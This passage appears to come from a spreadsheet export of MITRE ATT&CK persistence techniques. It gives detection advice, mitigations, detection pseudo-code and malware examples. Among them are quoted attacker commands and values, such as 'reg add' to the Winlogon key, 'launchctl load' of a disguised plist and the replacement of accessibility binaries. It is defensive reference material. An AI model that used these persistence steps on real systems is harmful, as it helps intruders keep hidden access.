[Gazer](https://attack.mitre.org/software/S0168) can establish persistence by setting the value “Shell” with “explorer.exe, %malware_pathfile%” under the Registry key &lt;code&gt;HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon&lt;/code&gt;.(Citation: ESET Gazer Aug 2017)
KeyBoy
[KeyBoy](https://attack.mitre.org/software/S0387) issues the command &lt;code&gt;reg add “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon”&lt;/code&gt; to achieve persistence.(Citation: PWC KeyBoys Feb 2017) (Citation: CitizenLab KeyBoy Nov 2016)
Remexi
[Remexi](https://attack.mitre.org/software/S0375) achieves persistence using Userinit by adding the Registry key &lt;code&gt;HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit&lt;/code&gt;.(Citation: Securelist Remexi Jan 2019)
Revenge RAT
[Revenge RAT](https://attack.mitre.org/software/S0379) creates a Registry key at &lt;code&gt;HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell&lt;/code&gt; to survive a system reboot.(Citation: Cylance Shaheen Nov 2018)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Ensure Launch Agent's &lt;code&gt; ProgramArguments &lt;/code&gt; key pointing to executables located in the &lt;code&gt;/tmp&lt;/code&gt; or &lt;code&gt;/shared&lt;/code&gt; folders are in alignment with enterprise policy. Ensure all Launch Agents with the &lt;code&gt;RunAtLoad&lt;/code&gt; key set to &lt;code&gt;true&lt;/code&gt; are in alignment with policy.
File Creation
Monitor for newly constructed files that may create or modify launch agents to repeatedly execute malicious payloads as part of persistence.
File Modification
Launch Agents also require files on disk for persistence which can also be monitored via other file monitoring applications.
Service Creation
Monitor Launch Agent creation through additional plist files and utilities such as Objective-See’s KnockKnock application. 
Service Modification
Monitor for changes made to launch agents to repeatedly execute malicious payloads as part of persistence.
Restrict File and Directory Permissions
Set group policies to restrict file permissions to the &lt;code&gt;~/launchagents&lt;/code&gt; folder.(Citation: piazza launch agent mitigation)
Bundlore
[Bundlore](https://attack.mitre.org/software/S0482) can persist via a LaunchAgent.(Citation: MacKeeper Bundlore Apr 2019)
Calisto
[Calisto](https://attack.mitre.org/software/S0274) adds a .plist file to the /Library/LaunchAgents folder to maintain persistence.(Citation: Securelist Calisto July 2018)
CoinTicker
[CoinTicker](https://attack.mitre.org/software/S0369) creates user launch agents named .espl.plist and com.apple.[random string].plist to establish persistence.(Citation: CoinTicker 2019)	
CookieMiner
[CookieMiner](https://attack.mitre.org/software/S0492) has installed multiple new Launch Agents in order to maintain persistence for cryptocurrency mining software.(Citation: Unit42 CookieMiner Jan 2019)
CrossRAT
[CrossRAT](https://attack.mitre.org/software/S0235) creates a Launch Agent on macOS.(Citation: Lookout Dark Caracal Jan 2018)
Dacls
[Dacls](https://attack.mitre.org/software/S0497) can establish persistence via a LaunchAgent.(Citation: SentinelOne Lazarus macOS July 2020)(Citation: TrendMicro macOS Dacls May 2020)
Dok
[Dok](https://attack.mitre.org/software/S0281) installs two LaunchAgents to redirect all network traffic with a randomly generated name for each plist file maintaining the format &lt;code&gt;com.random.name.plist&lt;/code&gt;.(Citation: objsee mac malware 2017)(Citation: CheckPoint Dok)
FruitFly
[FruitFly](https://attack.mitre.org/software/S0277) persists via a Launch Agent.(Citation: objsee mac malware 2017)
Green Lambert
[Green Lambert](https://attack.mitre.org/software/S0690) can create a [Launch Agent](https://attack.mitre.org/techniques/T1543/001) with the `RunAtLoad` key-value pair set to &lt;code&gt;true&lt;/code&gt;, ensuring the `com.apple.GrowlHelper.plist` file runs every time a user logs in.(Citation: Objective See Green Lambert for OSX Oct 2021)(Citation: Glitch-Cat Green Lambert ATTCK Oct 2021)
Keydnap
[Keydnap](https://attack.mitre.org/software/S0276) uses a Launch Agent to persist.(Citation: synack 2016 review)
Komplex
 The [Komplex](https://attack.mitre.org/software/S0162) trojan creates a persistent launch agent called with &lt;code&gt;$HOME/Library/LaunchAgents/com.apple.updates.plist&lt;/code&gt; with &lt;code&gt;launchctl load -w ~/Library/LaunchAgents/com.apple.updates.plist&lt;/code&gt;.(Citation: Sofacy Komplex Trojan)
MacMa
[MacMa](https://attack.mitre.org/software/S1016) installs a `com.apple.softwareupdate.plist` file in the `/LaunchAgents` folder with the `RunAtLoad` value set to `true`. Upon user login, [MacMa](https://attack.mitre.org/software/S1016) is executed from `/var/root/.local/softwareupdate` with root privileges. Some variations also include the `LimitLoadToSessionType` key with the value `Aqua`, ensuring the [MacMa](https://attack.mitre.org/software/S1016) only runs when there is a logged in GUI user.(Citation: ESET DazzleSpy Jan 2022)(Citation: Objective-See MacMa Nov 2021)
MacSpy
[MacSpy](https://attack.mitre.org/software/S0282) persists via a Launch Agent.(Citation: objsee mac malware 2017)
NETWIRE
[NETWIRE](https://attack.mitre.org/software/S0198) can use launch agents for persistence.(Citation: Red Canary NETWIRE January 2020)
OSX_OCEANLOTUS.D
[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) can create a persistence file in the folder &lt;code&gt;/Library/LaunchAgents&lt;/code&gt;.(Citation: TrendMicro MacOS April 2018)(Citation: Trend Micro MacOS Backdoor November 2020)
Proton
[Proton](https://attack.mitre.org/software/S0279) persists via Launch Agent.(Citation: objsee mac malware 2017)
ThiefQuest
[ThiefQuest](https://attack.mitre.org/software/S0595) installs a launch item using an embedded encrypted launch agent property list template. The plist file is installed in the &lt;code&gt;~/Library/LaunchAgents/&lt;/code&gt; folder and configured with the path to the persistent binary located in the &lt;code&gt;~/Library/&lt;/code&gt; folder.(Citation: wardle evilquest parti)
macOS.OSAMiner
[macOS.OSAMiner](https://attack.mitre.org/software/S1048) has placed a [Stripped Payloads](https://attack.mitre.org/techniques/T1027/008) with a `plist` extension in the [Launch Agent](https://attack.mitre.org/techniques/T1543/001)'s folder. (Citation: SentinelLabs reversing run-only applescripts 2021)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Command-line invocation of tools capable of modifying services may be unusual, depending on how systems are typically used in a particular environment. Look for abnormal process call trees from known services and for execution of other commands that could relate to Discovery or other adversary techniques.
Driver Load
Monitor for new service driver installations and loads (ex: Sysmon Event ID 6) that are not part of known software update/patch cycles.
File Creation
Monitor for newly constructed files that may create or modify system-level processes to repeatedly execute malicious payloads as part of persistence.
File Modification
Monitor for changes to files associated with system-level processes.
OS API Execution
Monitor for API calls that may create or modify system-level processes to repeatedly execute malicious payloads as part of persistence.
Process Creation
New, benign system processes may be created during installation of new software.
Service Creation
Monitor for newly constructed services/daemons that may create or modify system-level processes to repeatedly execute malicious payloads as part of persistence. 
Service Modification
Monitor for changes to system processes that do not correlate with known software, patch cycles, etc., including by comparing results against a trusted system baseline.
Windows Registry Key Creation
Monitor for newly constructed windows registry keys that may create or modify system-level processes to repeatedly execute malicious payloads as part of persistence.
Windows Registry Key Modification
Monitor for changes to windows registry keys and/or values that may create or modify system-level processes to repeatedly execute malicious payloads as part of persistence.
Audit
Use auditing tools capable of detecting privilege and service abuse opportunities on systems within an enterprise and correct them.
Behavior Prevention on Endpoint
On Windows 10, enable Attack Surface Reduction (ASR) rules to prevent an application from writing a signed vulnerable driver to the system.(Citation: Malicious Driver Reporting Center) On Windows 10 and 11, enable Microsoft Vulnerable Driver Blocklist to assist in hardening against third party-developed drivers.(Citation: Microsoft driver block rules)  
Code Signing
Enforce registration and execution of only legitimately signed service drivers where possible.
Limit Software Installation
Restrict software installation to trusted repositories only and be cautious of orphaned software packages.
Operating System Configuration
Ensure that Driver Signature Enforcement is enabled to restrict unsigned drivers from being installed. 
Restrict File and Directory Permissions
Restrict read/write access to system-level process files to only select privileged users who have a legitimate need to manage system services.
User Account Management
Limit privileges of user accounts and groups so that only authorized administrators can interact with system-level process changes and service configurations.
Exaramel for Linux
[Exaramel for Linux](https://attack.mitre.org/software/S0401) has a hardcoded location that it uses to achieve persistence if the startup system is Upstart or System V and it is running as root.(Citation: ANSSI Sandworm January 2021)
</t>
  </si>
  <si>
    <t xml:space="preserve">Active Directory Object Modification
Monitor for changes made in the Active Directory that may use scripts automatically executed at boot or logon initialization to establish persistence.
Command Execution
Monitor executed commands and arguments that may consist of logon scripts for unusual access by abnormal users or at abnormal times.
File Creation
Monitor for newly constructed files that may use scripts automatically executed at boot or logon initialization to establish persistence.
File Modification
Monitor for changes made to files that are modified by unusual accounts outside of normal administration duties.
Process Creation
Monitor for newly executed processes that may use scripts automatically executed at boot or logon initialization to establish persistence. Adversaries may schedule software to run whenever a user logs into the system; this is done to establish persistence and sometimes for lateral movement. This trigger is established through the registry key &lt;code&gt;HKEY_CURRENT_USER\EnvironmentUserInitMprLogonScript&lt;/code&gt;. This signature looks edits to existing keys or creation of new keys in that path. Users purposefully adding benign scripts to this path will result in false positives; that case is rare, however. There are other ways of running a script at startup or login that are not covered in this signature. Note that this signature overlaps with the Windows Sysinternals Autoruns tool, which would also show changes to this registry path.
&lt;h4&gt;Analytic 1 - Boot or Logon Initialization Scripts &lt;/h4&gt;
&lt;code&gt;logon_script_key_processes = filter processes where (
  command_line = "*reg*add*\Environment*UserInitMprLogonScript")
registry = search (Registry:Add OR Registry:Edit)
registry_logon_key_events = filter registry where (
  key = "*\Environment*UserInitMprLogonScript") &lt;/code&gt;
Windows Registry Key Creation
Monitor for newly constructed windows registry keys that may use scripts automatically executed at boot or logon initialization to establish persistence.
Restrict File and Directory Permissions
Restrict write access to logon scripts to specific administrators.
Restrict Registry Permissions
Ensure proper permissions are set for Registry hives to prevent users from modifying keys for logon scripts that may lead to persistence.
APT29
[APT29](https://attack.mitre.org/groups/G0016) has hijacked legitimate application-specific startup scripts to enable malware to execute on system startup.(Citation: Mandiant APT29 Eye Spy Email Nov 22)
Rocke
[Rocke](https://attack.mitre.org/groups/G0106) has installed an "init.d" startup script to maintain persistence.(Citation: Anomali Rocke March 2019)	
RotaJakiro
Depending on the Linux distribution and when executing with root permissions, [RotaJakiro](https://attack.mitre.org/software/S1078) may install persistence using a `.conf` file in the `/etc/init/` folder.(Citation: RotaJakiro 2021 netlab360 analysis)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments for logon scripts
File Creation
Monitor for newly constructed files by unusual accounts outside of normal administration duties
File Modification
Monitor for changes made to files for unexpected modifications to /Library/StartupItem folder
Process Creation
Monitor for newly constructed processes and/or command-lines that execute during the boot up process to check for unusual or unknown applications and behavior
Restrict File and Directory Permissions
Since StartupItems are deprecated, preventing all users from writing to the &lt;code&gt;/Library/StartupItems&lt;/code&gt; directory would prevent any startup items from getting registered.
jRAT
[jRAT](https://attack.mitre.org/software/S0283) can list and manage startup entries.(Citation: Kaspersky Adwind Feb 2016)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments that may gain persistence and elevate privileges by executing malicious content triggered by the Event Monitor Daemon (emond).
File Creation
Monitor emond rules creation by checking for files created in &lt;code&gt;/etc/emond.d/rules/&lt;/code&gt; and &lt;code&gt;/private/var/db/emondClients&lt;/code&gt;.
File Modification
Monitor emond rules creation by checking for files modified in &lt;code&gt;/etc/emond.d/rules/&lt;/code&gt; and &lt;code&gt;/private/var/db/emondClients&lt;/code&gt;.
Process Creation
Monitor newly executed processes that may gain persistence and elevate privileges by executing malicious content triggered by the Event Monitor Daemon (emond).
Disable or Remove Feature or Program
Consider disabling emond by removing the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) plist file.
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments that may modify XDG autostart entries to execute programs or commands during system boot.
File Creation
Malicious XDG autostart entries may be detected by auditing file creation events within the &lt;code&gt;/etc/xdg/autostart&lt;/code&gt; and &lt;code&gt;~/.config/autostart&lt;/code&gt; directories. Depending on individual configurations, defenders may need to query the environment variables &lt;code&gt;$XDG_CONFIG_HOME&lt;/code&gt; or &lt;code&gt;$XDG_CONFIG_DIRS&lt;/code&gt; to determine the paths of Autostart entries. Autostart entry files not associated with legitimate packages may be considered suspicious. Suspicious entries can also be identified by comparing entries to a trusted system baseline.
File Modification
Malicious XDG autostart entries may be detected by auditing file modification events within the &lt;code&gt;/etc/xdg/autostart&lt;/code&gt; and &lt;code&gt;~/.config/autostart&lt;/code&gt; directories. Depending on individual configurations, defenders may need to query the environment variables &lt;code&gt;$XDG_CONFIG_HOME&lt;/code&gt; or &lt;code&gt;$XDG_CONFIG_DIRS&lt;/code&gt; to determine the paths of Autostart entries. Autostart entry files not associated with legitimate packages may be considered suspicious. Suspicious entries can also be identified by comparing entries to a trusted system baseline.
Process Creation
Monitor newly executed processes that may modify XDG autostart entries to execute programs or commands during system boot.
Limit Software Installation
Restrict software installation to trusted repositories only and be cautious of orphaned software packages.
Restrict File and Directory Permissions
Restrict write access to XDG autostart entries to only select privileged users.
User Account Management
Limit privileges of user accounts so only authorized privileged users can create and modify XDG autostart entries.
CrossRAT
[CrossRAT](https://attack.mitre.org/software/S0235) can use an XDG Autostart to establish persistence.(Citation: Red Canary Netwire Linux 2022)
Fysbis
If executing without root privileges, [Fysbis](https://attack.mitre.org/software/S0410) adds a `.desktop` configuration file to the user's `~/.config/autostart` directory.(Citation: Red Canary Netwire Linux 2022)(Citation: Fysbis Dr Web Analysis)
NETWIRE
[NETWIRE](https://attack.mitre.org/software/S0198) can use XDG Autostart Entries to establish persistence on Linux systems.(Citation: Red Canary NETWIRE January 2020)
Pupy
[Pupy](https://attack.mitre.org/software/S0192) can use an XDG Autostart to establish persistence.(Citation: Red Canary Netwire Linux 2022)
RotaJakiro
When executing with user-level permissions, [RotaJakiro](https://attack.mitre.org/software/S1078) can install persistence using a .desktop file under the `$HOME/.config/autostart/` folder.(Citation: RotaJakiro 2021 netlab360 analysis)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments that may abuse time providers to execute DLLs when the system boots.
Module Load
There is no restriction on the number of custom time providers registrations, though each may require a DLL payload written to disk. (Citation: Github W32Time Oct 2017)
Process Creation
Monitor newly executed processes, such as the W32tm.exe utility. (Citation: Microsoft W32Time May 2017) The Sysinternals Autoruns tool may also be used to analyze auto-starting locations, including DLLs listed as time providers. (Citation: TechNet Autoruns)
Windows Registry Key Modification
Monitor for changes made to windows registry keys and/or values modifying W32Time information in the Registry.
Restrict File and Directory Permissions
Consider using Group Policy to configure and block additions/modifications to W32Time DLLs. (Citation: Microsoft W32Time May 2017)
Restrict Registry Permissions
Consider using Group Policy to configure and block modifications to W32Time parameters in the Registry. (Citation: Microsoft W32Time May 2017)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments of .scr files.
&lt;h4&gt; Analytic 1 - Modify the HKCU\Control Panel\Desktop registry key &lt;/h4&gt;
&lt;code&gt; suspicious_processes = filter processes where
  (event_id == "1" OR event_id == "4688") AND
  (ProcessCommandLine LIKE '%reg%' AND ProcessCommandLine LIKE '%add%' AND ProcessCommandLine LIKE '%HKCU\Control Panel\Desktop\%') &lt;/code&gt;
File Creation
Monitor newly constructed files that may establish persistence by executing malicious content triggered by user inactivity.
&lt;h4&gt; Analytic 1 - Created on disk that are being used as Screensaver files &lt;/h4&gt;
&lt;code&gt;screensaver_key_modification = filter ProcessGuid, ProcessFilePath, UserName, RegistryKeyPath, RegistryKeyValueData where
  event_id == "13" AND
  RegistryKeyPath LIKE '%Software\Policies\Microsoft\Windows\Control Panel\Desktop\SCRNSAVE.EXE%'
new_files = filter ProcessFilePath, UserName, FileName where event_id == "11"
suspicious_files = filter k.ProcessGuid, k.ProcessFilePath, k.UserName, k.RegistryKeypath, k.RegistryKeyValueData FROM screensaver_key_modification k
INNER JOIN new_files f
ON k.RegistryKeyValueData = f.FileName &lt;/code&gt;
File Modification
Monitor for changes made to files that may establish persistence by executing malicious content triggered by user inactivity.
Note: Although there are no standard events for file modification, Windows Event ID 4663 (An Attempt Was Made to Access An Object) can be used to alert on attempted accesses of screensaver files (typically ending in a file extension of .scr). 
Process Creation
Monitor newly executed processes that may establish persistence by executing malicious content triggered by user inactivity.
&lt;h4&gt; Analytic 1 : New processes whose image files are being used as Screensaver files and make an outbound network connection to unknown IP address &lt;/h4&gt;
&lt;code&gt;new_processes = filter ProcessGuid, ProcessFilePath, ProcessCommandLine, UserName
FROM ProcessCreationData
WHERE
  event_id == "1"
new_network_connections = filter ProcessFilePath, DestinationIp
FROM NetworkConnectionData
WHERE
  event_id == "3"
screensaver_key_modification = filter ProcessGuid, ProcessFilePath, UserName, RegistryKeyPath, RegistryKeyValueData 
FROM KeyModificationData
WHERE
  event_id == "13" AND
  RegistryKeyPath LIKE '%Software\Policies\Microsoft\Windows\Control Panel\Desktop\SCRNSAVE.EXE%'
screensaver_processes = filter p.ProcessGuid, p.ProcessFilePath, p.UserName
FROM new_processes p
INNER JOIN screensaver_key_modification k
ON p.ProcessFilePath = k.RegistryKeyValueData
suspicious_processes = filter p.ProcessGuid, p.ProcessFilePath, p.UserName, n.DestinationIp
FROM new_network_connections n
INNER JOIN screensaver_processes p
ON p.ProcessFilePath = n.ProcessFilePath
WHERE
  n.DestinationIP NOT IN ('KnownIp01','KnownIp02')&lt;/code&gt;
Windows Registry Key Modification
Monitor changes to screensaver configuration changes in the Registry that may not correlate with typical user behavior. Tools such as Sysinternals Autoruns can be used to detect changes to the screensaver binary path in the Registry. Default screen saver files are stored in C:\Windows\System32. Use these files as a reference when defining list of not suspicious screen saver files.
&lt;h4&gt; Analytic 1 : Registry Edit from Screensaver &lt;/h4&gt;
&lt;code&gt;scr_reg_events = filter processes where (
  event_id == "13" AND
  key="*\\Software\\Policies\\Microsoft\\Windows\\Control Panel\\Desktop\\SCRNSAVE.EXE" AND
  RegistryKeyValueData NOT IN ('PathToScreenSaverFile1','PathToScreenSaverFile2')) &lt;/code&gt;
Disable or Remove Feature or Program
Use Group Policy to disable screensavers if they are unnecessary.(Citation: TechNet Screensaver GP)
Execution Prevention
Block .scr files from being executed from non-standard locations.
Gazer
[Gazer](https://attack.mitre.org/software/S0168) can establish persistence through the system screensaver by configuring it to execute the malware.(Citation: ESET Gazer Aug 2017)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments that may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers.
Process Creation
Monitor for abnormal usage of the GFlags tool as well as common processes spawned under abnormal parents and/or with creation flags indicative of debugging such as &lt;code&gt;DEBUG_PROCESS&lt;/code&gt; and &lt;code&gt;DEBUG_ONLY_THIS_PROCESS&lt;/code&gt;. (Citation: Microsoft Dev Blog IFEO Mar 2010)
Windows Registry Key Modification
Monitor Registry values associated with IFEOs, as well as silent process exit monitoring, for modifications that do not correlate with known software, patch cycles, etc.
TEMP.Veles
[TEMP.Veles](https://attack.mitre.org/groups/G0088) has modified and added entries within &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options&lt;/code&gt; to maintain persistence.(Citation: FireEye TRITON 2019)	
SDBbot
[SDBbot](https://attack.mitre.org/software/S0461) has the ability to use image file execution options for persistence if it detects it is running with admin privileges on a Windows version newer than Windows 7.(Citation: Proofpoint TA505 October 2019)
SUNBURST
[SUNBURST](https://attack.mitre.org/software/S0559) created an Image File Execution Options (IFEO) Debugger registry value for the process &lt;code&gt;dllhost.exe&lt;/code&gt; to trigger the installation of [Cobalt Strike](https://attack.mitre.org/software/S0154).(Citation: Microsoft Deep Dive Solorigate January 2021)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments that may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Command line invocation of tools capable of modifying the Registry for associated keys are also suspicious. Utility arguments and the binaries themselves should be monitored for changes.
Note: Event ID 4104 (from the Microsoft-Windows-Powershell/Operational log) captures Powershell script blocks, which can be analyzed and used to detect on abuse of Accessibility Features. 
File Creation
Monitor newly constructed files that may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features.
File Modification
Monitor for changes made to files that may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Changes to accessibility utility binaries or binary paths that do not correlate with known software, patch cycles, etc., are suspicious.
Process Creation
Monitor newly executed processes that may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features.
An adversary can use accessibility features (Ease of Access), such as StickyKeys or Utilman, to launch a command shell from the logon screen and gain SYSTEM access. Since an adversary does not have physical access to the machine, this technique must be run within Remote Desktop. To prevent an adversary from getting to the login screen without first authenticating, Network-Level Authentication (NLA) must be enabled. If a debugger is set up for one of the accessibility features, then it will intercept the process launch of the feature and instead execute a new command line. This analytic looks for instances of cmd.exe or powershell.exe launched directly from the logon process, winlogon.exe. 
Several accessibility programs can be run using the Ease of Access center
- sethc.exe handles StickyKeys
- utilman.exe is the Ease of Access menu
- osk.exe runs the On-Screen Keyboard
- narrator.exe reads screen text over audio
- magnify.exe magnifies the view of the screen near the cursor
One simple way to implement this technique is to note that in a default Windows configuration there are no spaces in the path to the system32 folder. If the accessibility programs are ever run with a Debugger set, then Windows will launch the Debugger process and append the command line to the accessibility program. As a result, a space is inserted in the command line before the path. Looking for any instances of a space in the command line before the name of an accessibility program will help identify when Debuggers are set.
The Windows Registry location HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options allows for parameters to be set for applications during execution. One feature used by malicious actors is the “Debugger” option. When a key has this value enabled, a Debugging command line can be specified. Windows will launch the Debugging command line, and pass the original command line in as an argument. Adversaries can set a Debugger for Accessibility Applications. The analytic looks for the original command line as an argument to the Debugger. When the strings “sethc.exe”, “utilman.exe”, “osk.exe”, “narrator.exe”, and “Magnify.exe” are detected in the arguments, but not as the main executable, it is very likely that a Debugger is set.
Note: Event IDs are for Sysmon (Event ID 1 - process create) and Windows Security Log (Event ID 4688 - a new process has been created). The Analytic example looks for any creation of common accessibility processes such as sethc.exe but does no other filtering, which may result in false positives. Therefore, we recommend tuning any such analytics by including additional logic (e.g., testing the name of the parent process) that helps reduce false positives.
Analytic 2 could depend on the possibility of the known strings used as arguments for other applications used in the day-to-day environment. Although the chance of the string “sethc.exe” being used as an argument for another application is unlikely, it still is a possibility.
&lt;h4&gt; Analytic 1 : Command Launched from Winlogon &lt;/h4&gt;
&lt;code&gt; processes = filter process where ((event_id == "1" OR event_id="4688") AND (parent_exe == "winlogon.exe" and exe == "cmd.exe") AND command_line="*(sethc.exe OR utilman.exe OR osk.exe OR narrator.exe OR magnify.exe)*"&lt;/code&gt;
&lt;h4&gt; Analytic 2 : Debuggers for Accessibility Applications &lt;/h4&gt;
&lt;code&gt; debuggers = filter process where (command_line match "$.* .*(sethcutilmanosknarratormagnify)\.exe")&lt;/code&gt;
Windows Registry Key Modification
Monitor Registry keys within &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options&lt;/code&gt;.
Execution Prevention
Adversaries can replace accessibility features binaries with alternate binaries to execute this technique. Identify and block potentially malicious software executed through accessibility features functionality by using application control (Citation: Beechey 2010) tools, like Windows Defender Application Control(Citation: Microsoft Windows Defender Application Control), AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)
Limit Access to Resource Over Network
If possible, use a Remote Desktop Gateway to manage connections and security configuration of RDP within a network.(Citation: TechNet RDP Gateway)
Operating System Configuration
To use this technique remotely, an adversary must use it in conjunction with RDP. Ensure that Network Level Authentication is enabled to force the remote desktop session to authenticate before the session is created and the login screen displayed. It is enabled by default on Windows Vista and later.(Citation: TechNet RDP NLA)
APT29
[APT29](https://attack.mitre.org/groups/G0016) used sticky-keys to obtain unauthenticated, privileged console access.(Citation: Mandiant No Easy Breach)(Citation: FireEye APT29 Domain Fronting)
APT3
[APT3](https://attack.mitre.org/groups/G0022) replaces the Sticky Keys binary &lt;code&gt;C:\Windows\System32\sethc.exe&lt;/code&gt; for persistence.(Citation: aptsim)
APT41
[APT41](https://attack.mitre.org/groups/G0096) leveraged sticky keys to establish persistence.(Citation: FireEye APT41 Aug 2019) 
Axiom
[Axiom](https://attack.mitre.org/groups/G0001) actors have been known to use the Sticky Keys replacement within RDP sessions to obtain persistence.(Citation: Novetta-Axiom)
Deep Panda
[Deep Panda](https://attack.mitre.org/groups/G0009) has used the sticky-keys technique to bypass the RDP login screen on remote systems during intrusions.(Citation: RSA Shell Crew)
Fox Kitten
[Fox Kitten](https://attack.mitre.org/groups/G0117) has used sticky keys to launch a command prompt.(Citation: CISA AA20-259A Iran-Based Actor September 2020)
Empire
[Empire](https://attack.mitre.org/software/S0363) can leverage WMI debugging to remotely replace binaries like sethc.exe, Utilman.exe, and Magnify.exe with cmd.exe.(Citation: Github PowerShell Empire)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments that may establish persistence and/or elevate privileges by executing malicious content triggered by AppCert DLLs loaded into processes.
Module Load
Monitor DLL loads by processes, specifically looking for DLLs that are not recognized or not normally loaded into a process. Tools such as Sysinternals Autoruns may overlook AppCert DLLs as an auto-starting location. (Citation: TechNet Autoruns) (Citation: Sysinternals AppCertDlls Oct 2007)
OS API Execution
Monitor and analyze application programming interface (API) calls that are indicative of Registry edits, such as &lt;code&gt;RegCreateKeyEx&lt;/code&gt; and &lt;code&gt;RegSetValueEx&lt;/code&gt;. (Citation: Elastic Process Injection July 2017)
Process Creation
Monitor newly executed processes that may establish persistence and/or elevate privileges by executing malicious content triggered by AppCert DLLs loaded into processes.
Windows Registry Key Modification
Monitor the AppCertDLLs Registry value for modifications that do not correlate with known software, patch cycles, etc.
Execution Prevention
Adversaries install new AppCertDLL binaries to execute this technique. Identify and block potentially malicious software executed through AppCertDLLs functionality by using application control (Citation: Beechey 2010) tools, like Windows Defender Application Control(Citation: Microsoft Windows Defender Application Control), AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)
PUNCHBUGGY
[PUNCHBUGGY](https://attack.mitre.org/software/S0196) can establish using a AppCertDLLs Registry key.(Citation: FireEye Know Your Enemy FIN8 Aug 2016)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments that may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes.
Module Load
Monitor DLL loads by processes that load user32.dll and look for DLLs that are not recognized or not normally loaded into a process.
OS API Execution
Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as &lt;code&gt;RegCreateKeyEx&lt;/code&gt; and &lt;code&gt;RegSetValueEx&lt;/code&gt;. (Citation: Elastic Process Injection July 2017)
Process Creation
Monitor newly executed processes that may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes.
Note: Sysmon Event ID 1 (process create) and Windows Security Log Event ID 4688 (a new process has been created) can be used to detect new reg.exe processes that modify the AppInit DLL registry keys since the registry keys are specified as a command-line parameter.
Windows Registry Key Modification
Monitor the AppInit_DLLs Registry values for modifications that do not correlate with known software, patch cycles, etc. Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes. Dynamic-link libraries (DLLs) that are specified in the AppInit_DLLs value in the Registry keys HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows or HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows are loaded by user32.dll into every process that loads user32.dll. These values can be abused to obtain elevated privileges by causing a malicious DLL to be loaded and run in the context of separate processes. Accordingly, this analytic looks for modifications to these registry keys that may be indicative of this type of abuse.
&lt;h4&gt; Analytic 1 : AppInit DLLs &lt;/h4&gt;
&lt;code&gt; appinit_keys = filter registry_keys where ((event_id == "12" OR event_id == "13" event_id == "14") AND
  key = "*\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\Appinit_Dlls\*" OR
  key = "*\SOFTWARE\\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows\Appinit_Dlls\*"")&lt;/code&gt;
Execution Prevention
Adversaries can install new AppInit DLLs binaries to execute this technique. Identify and block potentially malicious software executed through AppInit DLLs functionality by using application control (Citation: Beechey 2010) tools, like Windows Defender Application Control(Citation: Microsoft Windows Defender Application Control), AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)
Update Software
Upgrade to Windows 8 or later and enable secure boot.
APT39
[APT39](https://attack.mitre.org/groups/G0087) has used malware to set &lt;code&gt;LoadAppInit_DLLs&lt;/code&gt; in the Registry key &lt;code&gt;SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows&lt;/code&gt; in order to establish persistence.(Citation: FBI FLASH APT39 September 2020)
Cherry Picker
Some variants of [Cherry Picker](https://attack.mitre.org/software/S0107) use AppInit_DLLs to achieve persistence by creating the following Registry key: &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows "AppInit_DLLs"="pserver32.dll"&lt;/code&gt;(Citation: Trustwave Cherry Picker)
Ramsay
[Ramsay](https://attack.mitre.org/software/S0458) can insert itself into the address space of other applications using the AppInit DLL Registry key.(Citation: Eset Ramsay May 2020)	
T9000
